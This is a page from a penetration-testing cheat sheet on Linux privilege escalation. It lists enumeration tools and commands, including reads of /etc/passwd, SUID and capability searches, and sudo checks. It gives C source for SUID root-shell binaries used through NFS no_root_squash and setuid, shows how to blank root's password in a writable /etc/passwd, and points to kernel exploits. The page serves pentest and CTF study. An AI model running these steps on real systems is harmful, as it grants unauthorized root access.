d4Rk's 1337 h4x0r guide
About me
Search…
Introduction
Reconnaissance
Recon
OSINT
Enumeration
Network discovery
Port scanning
Webserver scanning
Exploit detection
Fuzzing
Process monitoring
Exploitation
Shells
Passwords
Web
Buffer overflow
Misc
Privilege escalation
Linux
Overview
Windows
Post exploitation
Loot
Pivoting
Standalone Tools
Services
TCP
UDP
Misc
File transfer
Overview
Wget
Pure-FTPd
TFTP
VBScript: Wget clone
Misc
Bash
Burp Suite
Crypto
Ebowla
Firefox extensions
Impacket
Memory forensics
Metasploit Framework (MSF)
MITM
Msfvenom
Pass the Hash (PTH)
PowerShell
PowerShell on Linux
Wireshark
Wordlists and dictionaries
Bug Bounty
Platforms
Tools
Powered By GitBook
Overview

Guides

GTFOBins

GTFOBins is a curated list of Unix binaries that can be used to bypass local security restrictions in misconfigured systems. GTFOBins​

Automated

LinPEAS

Linux Privilege Escalation Awesome Script PEASS-ng/linPEAS at master · carlospolop/PEASS-ng · GitHub​

LinEnum

Scripted Local Linux Enumeration & Privilege Escalation Checks GitHub - rebootuser/LinEnum​

Linux Smart Enumeration (LSE)

Linux enumeration tool for pentesting and CTFs with verbosity levels GitHub - diego-treitos/linux-smart-enumeration​

Linux Exploit Suggester (LES)

Linux privilege escalation auditing tool GitHub - mzet-/linux-exploit-suggester​

linuxprivchecker.py

A Linux Privilege Escalation Check Script GitHub - sleventyeleven/linuxprivchecker​

Unix-privesc-check

Unix-privesc-checker is a script that runs on Unix systems (tested on Solaris 9, HPUX 11, Various Linuxes, FreeBSD 6.2). It tries to find misconfigurations that could allow local unprivileged users to escalate privileges to other users or to access local apps (e.g. databases). unix-privesc-check | Kali Linux Tools​

Manual

Kernel exploits

Get linux/kernel version E.g. Linux kali 5.14.0-kali2-arm64 #1 SMP Debian 5.14.9-2kali1 (2021-10-04) aarch64 GNU/Linux
uname -a
Get "marketing" name of distribution E.g. Ubuntu 20.04.1 LTS
cat /etc/issue
Get stuff like gcc E.g. Linux version 5.14.0-kali2-arm64 ([email protected]) (gcc-10 (Debian 10.3.0-11) 10.3.0, GNU ld (GNU Binutils for Debian) 2.37) #1 SMP Debian 5.14.9-2kali1 (2021-10-04)
cat /proc/version
-> Use searchsploit (exploit-db.com), Google, GitHub, etc. to check for public available kernel exploits.

Manual information gathering

Operating system

uname -a
cat /etc/issue
cat /proc/version
cat /etc/*-release

Users

Info about current user
id
Check for other users (non-service users normally start at id 1000)
cat /etc/passwd
Filter users with a login shell
grep -vE "nologin|false" /etc/passwd

Groups

Interesting unix groups
  • 44(video) <- has access to video output (weird stuff)
  • 6(disk) <- has raw access to the file system, read disk using e.g. debugfs

Sudo

Check current privilege status
sudo -l
Todo: LD_PRELOAD https://rafalcieslak.wordpress.com/2013/04/02/dynamic-linker-tricks-using-ld_preload-to-cheat-inject-features-and-investigate-programs/

SUID

Find files that have SUID or SGID bit set
find / -type f -perm -04000 -ls 2>/dev/null

Capabilities

List enabled capabilities
getcap -r / 2>/dev/null

Cron Jobs

cat /etc/crontab

NFS

Check for no_root_squash option in
cat /etc/exports
Mount share
mkdir /tmp/share
mount -o rw <ip>:/share /tmp/share
cd /tmp/share
Create SUID binary
int main()
{
setgid(0);
setuid(0);
system("/bin/bash");
return 0;
}
Compile it, set SUID bit
gcc binary.c binary -w
chmod +s binary
Run it on target
./binary

Processing running

See also: PSPY​
ps aux
-> Is there something special, maybe related to the users found?

Network

netstat -antup
-> Is any service running, we missed in the port scan (firewall?)

Packages

Debian
dpkg -l
CentOS, OpenSuse, Fedora, RHEL
rpm -qa (CentOS / openSUSE )
OpenBSD, FreeBSD
pkg_info
Check for manually installed stuff
/var/
/opt/
/usr/local
/usr/local/bin
/usr/local/src
/usr/src
/home/<username>

Weak services

Look for files that have root privileges but are writeable for everyone -> replace file with exploit

Check tools potentially vulnerable to priv esc

which awk perl python ruby gcc cc vi vim nmap find netcat nc wget tftp ftp 2>/dev/null

setuid

Check if available mount -> must not have nosuid
mount | grep -vE "nosuid"
setuid.c
int main(void) {
setuid(0);
setgid(0);
system("/bin/bash");
}
Alternative setuid.c
int main(int argc, char *argv[]) {
setreuid(0, 0);
execve("/bin/sh", NULL, NULL);
}
TODO: This doesn't seem to be working.. Did it ever? Where did I get this from? PWK? 😬
gcc setuid.c -o setuid
sudo chown root:root /tmp/setuid; sudo chmod 4755 /tmp/setuid

Writable /etc/passwd

Change root, remove the x (password flag) root:x:0:0:root:/root:/bin/bash -> root::0:0:root:/root:/bin/bash su -> root

Public exploits

Dirty COW

​Dirty COW (CVE-2016-5195) is a privilege escalation vulnerability in the Linux Kernel

Rational Love

glibc - 'getcwd()' Local Privilege Escalation 2018 local root exploit local-root-exploits/linux/CVE-2018-1000001 at master · 5H311-1NJ3C706/local-root-exploits · GitHub​
Privilege escalation - Previous
Linux
Next - Privilege escalation
Windows
Last modified 5mo ago
Copy link
Edit on GitHub
Outline
Guides
GTFOBins
Automated
LinPEAS
LinEnum
Linux Smart Enumeration (LSE)
Linux Exploit Suggester (LES)
linuxprivchecker.py
Unix-privesc-check
Manual
Kernel exploits
Manual information gathering
Operating system
Users
Groups
Sudo
SUID
Capabilities
Cron Jobs
NFS
Processing running
Network
Packages
Weak services
Check tools potentially vulnerable to priv esc
setuid
Writable /etc/passwd
Public exploits
Dirty COW
Rational Love